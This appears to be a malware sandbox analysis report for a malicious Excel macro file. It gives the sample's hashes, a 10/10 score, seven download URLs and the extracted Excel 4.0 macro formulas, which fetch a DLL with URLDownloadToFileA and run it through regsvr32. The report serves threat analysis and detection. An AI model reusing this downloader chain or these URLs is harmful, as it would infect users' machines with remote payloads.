Overview

overview

10

Static

static

10

ebc7158986...b.xlsm

windows7-x64

10

ebc7158986...b.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ebc7158986785f524c8c9b16516d6930c0f0e6810b9291f6636e359c718db7eb

  • Size

    20KB

  • Sample

    241120-qkewhsxgml

  • MD5

    3d9b46ec228475096d06662a6ce5048b

  • SHA1

    4014fa877de1cbad4502dfbfca4d1788fd320881

  • SHA256

    ebc7158986785f524c8c9b16516d6930c0f0e6810b9291f6636e359c718db7eb

  • SHA512

    c782e606daf13a3083616f2897602c903484caca36af6d14314483bb0a8151e5621398fda6f5aabe935ba2a261370330ea0546f22daa4e67b935b2c9ea6b3a01

  • SSDEEP

    384:CVb1GNjxKo4CGzPd6ZIwISKb5CzgObff9kC+xbX7ZnR:qINco4FLhnCBn9kC+xbLv

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/

http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/

http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/

http://aslar.dk/lj/AFAQXrxdyafuA3kn/

https://assf.com.ng/2021/coY6141cNQXQYGrob4o/

http://barth1.dk/_vti_cnf/AEyc6G/

https://www.baligrod.pl/wp-admin/QDSXoxha21C55/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aslar.dk/lj/AFAQXrxdyafuA3kn/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://assf.com.ng/2021/coY6141cNQXQYGrob4o/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://barth1.dk/_vti_cnf/AEyc6G/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.baligrod.pl/wp-admin/QDSXoxha21C55/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/
xlm40.dropper

http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/
xlm40.dropper

http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/

Targets

    • Target

      ebc7158986785f524c8c9b16516d6930c0f0e6810b9291f6636e359c718db7eb

    • Size

      20KB

    • MD5

      3d9b46ec228475096d06662a6ce5048b

    • SHA1

      4014fa877de1cbad4502dfbfca4d1788fd320881

    • SHA256

      ebc7158986785f524c8c9b16516d6930c0f0e6810b9291f6636e359c718db7eb

    • SHA512

      c782e606daf13a3083616f2897602c903484caca36af6d14314483bb0a8151e5621398fda6f5aabe935ba2a261370330ea0546f22daa4e67b935b2c9ea6b3a01

    • SSDEEP

      384:CVb1GNjxKo4CGzPd6ZIwISKb5CzgObff9kC+xbX7ZnR:qINco4FLhnCBn9kC+xbLv

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks